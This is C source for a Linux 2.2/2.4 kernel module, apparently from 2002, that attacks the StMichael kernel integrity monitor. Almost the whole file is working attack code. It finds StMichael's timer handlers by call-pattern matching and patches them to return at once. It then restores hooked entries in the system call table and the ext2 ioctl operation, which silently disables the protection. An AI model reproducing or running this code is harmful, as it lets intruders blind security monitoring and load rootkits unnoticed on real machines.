/*
 * Copyright (C) 2002 Stealth.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by Stealth.
 * 4. The name Stealth may not be used to endorse or promote
 *    products derived from this software without specific prior written
 *    permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */
#define __KERNEL__
#define MODULE

#ifdef MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/string.h>
#include <linux/sys.h>
#include <sys/syscall.h>
#include <linux/string.h>
#include <linux/timer.h>
#include <linux/sched.h>
#include <asm/system.h>
#include <linux/fs.h>

#include "ia32-decode.h"
#include "ia32-func-resolv.h"

#define KERNEL24

#define TVN_BITS 6
#define TVR_BITS 8
#define TVN_SIZE (1 << TVN_BITS)
#define TVR_SIZE (1 << TVR_BITS)
#define TVN_MASK (TVN_SIZE - 1)
#define TVR_MASK (TVR_SIZE - 1)


#ifdef KERNEL22
struct timer_vec {
        int index;
        struct timer_list *vec[TVN_SIZE];
};

struct timer_vec_root {
        int index;
        struct timer_list *vec[TVR_SIZE];
};

typedef struct timer_list timer_t;

#else
struct timer_vec {
        int index;
        struct list_head vec[TVN_SIZE];
};

struct timer_vec_root {
        int index;
        struct list_head vec[TVR_SIZE];
};
#endif


extern void *sys_call_table[];

timer_t timer;

struct SM_targets {
	int sm_pattern[20];	/* call-pattern for sm_timer_handler */
	int sm_i_pattern[20];	/* call-pattern for sm_i_timer_handler */
	int sm_dist, sm_i_dist;
	char *desc;
};

/* always depth 3 */
struct SM_targets targets[] = {
	{{7, 2, 3, 0, 0, 0, 2, 1, 1, 0, 7, 5, 0, 0, 2, 1, 1, 0, 4, 0},
	{7, 0, 2, 3, 0, 0, 0, 2, 1, 1, 0, 4, 0, 0, 0, 0, 8, 0, 0, 0},-488,488,
	"StMichael-0.11-checksum-fscheck-reallyimmutable-rokmem / kernel-2.2.18"},
	
	{{7, 0, 2, 3, 0, 0, 0, 2, 1, 1, 7, 5, 0, 0, 2, 1, 1, 0, 4, 0},
	{7, 0, 2, 3, 0, 0, 0, 2, 1, 1, 0 ,4, 0, 0, 0, 0, 8, 0, 0, 0,},-488,488,
	"StMichael-0.11-checksum-fscheck-reallyimmutable-rokmem / kernel-2.2.20"},

	{{7, 0, 6, 3, 0, 0, 0, 0, 0, 0, 0 , 2, 2, 1, 7, 5, 0, 0, 6, 1,},
	{7, 0, 6, 3, 0, 0, 0, 0, 0, 0, 0, 2, 2, 1, 0, 4, 0, 0, 0, 0},-512,512,
	"StMichael-0.11-checksum-fscheck-reallyimmutable-rokmem / kernel-2.4.18"},

	{{0}, {0}, 0, 0, NULL}
};


struct timer_vec *tv2, *tv3, *tv4, *tv5;
struct timer_vec_root *tv1;

int timer_done = 0;

#ifdef KERNEL24
//typedef struct timer_list timer_t;
#endif

#ifdef KERNEL22
int check_timer_list(struct timer_list *tl)
{
	struct timer_list *curr = tl;
	int i, p[20];

	if (((unsigned int)tl & 0xf0000000) < 0xc0000000)
		return 0;

	for (; curr != NULL; curr = curr->next) {
		if (((unsigned int)curr & 0xf0000000) < 0xc0000000)
			break;

		memset(p, 0, sizeof(p));
		ia32_call_pattern(curr->function, p, sizeof(p)/sizeof(p[0]), 3, 1);
		for (i = 0; targets[i].desc != NULL; ++i) {
			if (memcmp(p, targets[i].sm_pattern, sizeof(p)) == 0) {
				printk("sm_timer()=%p -> sm_i_timer()=%p (%s)\n",
				       curr->function,
				       (char*)curr->function+targets[i].sm_dist,
				       targets[i].desc);
				*(char*)curr->function = 0xc3; /* RET */
				*((char*)curr->function+targets[i].sm_dist) = 0xc3;
				timer_done = 1;
				return 0;
		
			}
			if (memcmp(p, targets[i].sm_i_pattern, sizeof(p)) == 0) {
				printk("sm_i_timer()=%p -> sm_timer()=%p (%s)\n",
				       curr->function,
				       (char*)curr->function+targets[i].sm_i_dist,
				       targets[i].desc);
				*(char*)curr->function = 0xc3; /* RET */
				*((char*)curr->function+targets[i].sm_i_dist) = 0xc3;
				timer_done = 1;
				return 0;	
			}
		}
	}
	return 0;
}
#else
extern spinlock_t timerlist_lock;

int check_timer_list(struct list_head tl)
{
	struct timer_list *timer = NULL;
	struct list_head *curr = NULL;
	int i = 0, p[20];


	list_for_each(curr, tl.next) {
		if (((unsigned int)curr & 0xf0000000) < 0xc0000000)
			break;

		timer = list_entry(curr, struct timer_list, list);
		if (((unsigned int)timer & 0xf0000000) < 0xc0000000)
			break;
		if (((unsigned int)timer->function & 0xf0000000) < 0xc0000000)
			break;

		memset(p, 0, sizeof(p));
		ia32_call_pattern(timer->function, p, sizeof(p)/sizeof(p[0]), 3, 1);

		for (i = 0; targets[i].desc != NULL; ++i) {
			if (memcmp(p, targets[i].sm_pattern, sizeof(p)) == 0) {
				printk("sm_timer()=%p -> sm_i_timer()=%p (%s)\n",
				       timer->function,
				       (char*)timer->function+targets[i].sm_dist,
				       targets[i].desc);
				*(char*)timer->function = 0xc3; /* RET */
				*((char*)timer->function+targets[i].sm_dist) = 0xc3;
				timer_done = 1;
				return 0;
			}
			if (memcmp(p, targets[i].sm_i_pattern, sizeof(p)) == 0) {
				printk("sm_i_timer()=%p -> sm_timer()=%p (%s)\n",
				       timer->function,
				       (char*)timer->function+targets[i].sm_i_dist,
				       targets[i].desc);
				*(char*)timer->function = 0xc3; /* RET */
				*((char*)timer->function+targets[i].sm_i_dist) = 0xc3;
				timer_done = 1;
				return 0;
			}
		}	
	}

	return 0;
}
#endif

int check_timer_vec(struct timer_vec *tv)
{
	int i;

	cli();
	//printk("V\n");
	for (i = 0; i < TVN_SIZE; ++i) {
		check_timer_list(tv->vec[i]);
	//	printk("%p\n", tv->vec[i]);
	}
	sti();
	return 0;
}

int check_timer_vec_root(struct timer_vec_root *tv)
{
	int i;
	
	cli();
	//printk("RV");
	for (i = 0; i < TVR_SIZE; ++i) {
	//	printk("%p\n", tv->vec[i]);
		check_timer_list(tv->vec[i]);
	}
	sti();
	return 0;
}


void bend_timer()
{
	ia32_instruction *instp, inst;
	char *ptr = (char*)add_timer;
	int i = 0;

	printk("bend_timer()\n");

	/* find tv structs */
	for (;;) {
		instp = ia32_decode_instruction(&ptr[i], &inst);

		if (strcmp(instp->opc.opcode->name, "lea") == 0 &&
		    instp->opc.displ_value != 0)
			break;
		i += instp->length;		
	}
	tv1 = (struct timer_vec_root*)(instp->opc.displ_value-sizeof(int));
#ifdef KERNEL22
	tv2 = (struct timer_vec*)((char*)tv1 - sizeof(struct timer_vec));
	tv3 = tv2 - 1;
	tv4 = tv3 - 1;
	tv5 = tv4 - 1;
#else
	tv2 = (struct timer_vec*)((char*)tv1 - 544);
	tv3 = (struct timer_vec*)((char*)tv2 - 544);
	tv4 = (struct timer_vec*)((char*)tv3 - 544);
	tv5 = (struct timer_vec*)((char*)tv4 - 544);
#endif
	//printk("<1>%p %p %p %p %p\n", tv1, tv2, tv3, tv4, tv5);

	check_timer_vec(tv2);
	check_timer_vec(tv3);
	check_timer_vec(tv4);
	check_timer_vec(tv5);
	check_timer_vec_root(tv1);

	return;
}


void bend_syscalls()
{
	void *im, *dm, *e, *cm;

	printk("bend_syscalls()\n");

	im = sys_call_table[__NR_init_module];
	dm = sys_call_table[__NR_delete_module];
	e = sys_call_table[__NR_exit];
	cm = sys_call_table[__NR_create_module];

	if ((im = ia32_find_absolute_call(im)) != NULL) {
		sys_call_table[__NR_init_module] = im;
		printk("orig_init_module()=%p\n", im);
	} else
		printk("Can't bend init_module()\n");

	if ((dm = ia32_find_absolute_call(dm)) != NULL) {
		sys_call_table[__NR_delete_module] = dm;
		printk("orig_delete_module()=%p\n", dm);
	} else
		printk("Can't bend delete_module\n");

	if ((e = ia32_find_absolute_call(e)) != NULL) {
		sys_call_table[__NR_exit] = e;
		printk("orig_exit()=%p\n", e);
	} else
		printk("Can't bend exit()\n");

	if ((cm = ia32_find_absolute_call(cm)) != NULL) {
		sys_call_table[__NR_create_module] = cm;
		printk("orig_create_module()=%p\n", cm);
	} else
		printk("Can't bend create_module\n");

	return;
}


void bend_vfs()
{
	void *io = NULL;
	struct file *filep;

	printk("bend_vfs()\n");

	/* restore ext2 VFS ops */
	if ((filep = filp_open("/sbin/init", O_RDONLY, 0)) == NULL)
		return;

	if ((io = ia32_find_absolute_call(filep->f_op->ioctl)) == NULL) {
		printk("ext2 VFS not bent\n");
		goto out;
	}

	filep->f_op->ioctl = io;

	/* TODO: resore kmem, the orig write-ptr is located
	 * below orig_exec ptr in StMichael.
	 */
out:
	filp_close(filep, 0);
	return;	
}


void bend_handler(unsigned long x)
{
	printk("Bender called.\n");

	bend_timer();
	if (timer_done == 0) {
		printk("No StMichael found. Try again.\n");
		return;
	}
	bend_syscalls();
	bend_vfs();

	return;
}


int init_module()
{

	memset(&timer, 0, sizeof(timer));
	init_timer(&timer);
	timer.expires = jiffies + 360;
	timer.function = bend_handler;
	add_timer(&timer);

	return 0;
}


int cleanup_module()
{
	return 0;
}

